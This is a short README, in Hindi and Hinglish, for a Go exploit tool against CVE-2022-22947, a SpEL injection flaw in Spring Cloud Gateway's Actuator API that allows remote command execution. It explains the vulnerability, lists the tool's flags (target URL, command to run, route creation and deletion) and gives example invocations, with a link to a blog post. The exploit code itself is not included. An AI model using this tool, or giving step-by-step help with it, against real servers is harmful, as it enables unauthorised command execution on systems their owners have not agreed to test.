
Go-आधारित शोषण CVE-2022-22947 के लिए, Spring Cloud Gateway में SpEL इंजेक्शन भेद्यता, जो Actuator API के माध्यम से दूरस्थ कमांड निष्पादन सक्षम करती है।
Spring Cloud Gateway Spring mein ek API gateway hai. Iske 3.1.0 aur 3.0.6 version (shamil) se pehle ek SpEL अभिव्यक्ति इंजेक्शन भेद्यता maujood thi, jab attacker Actuator API tak pahunch sakta hai, to woh is भेद्यता ka upyog karke koi bhi command execute kar sakta hai.
उपयोग:
➜ ./cve-2022-22947 -h
Usage of cve-2022-22947:
-c string
Execute command, Example: whoami (default "id")
-d Delete route.
-r string
New route name
-u string
Target Url, Example: http://127.0.0.1:8080
# example
[>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -c whoami -r exploit.
[>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -r exploit -d
सामना की गई समस्या: https://darkb1rd.github.io/2022/03/07/yuque/cve-2022-22947%20%E5%B0%8F%E7%82%B9/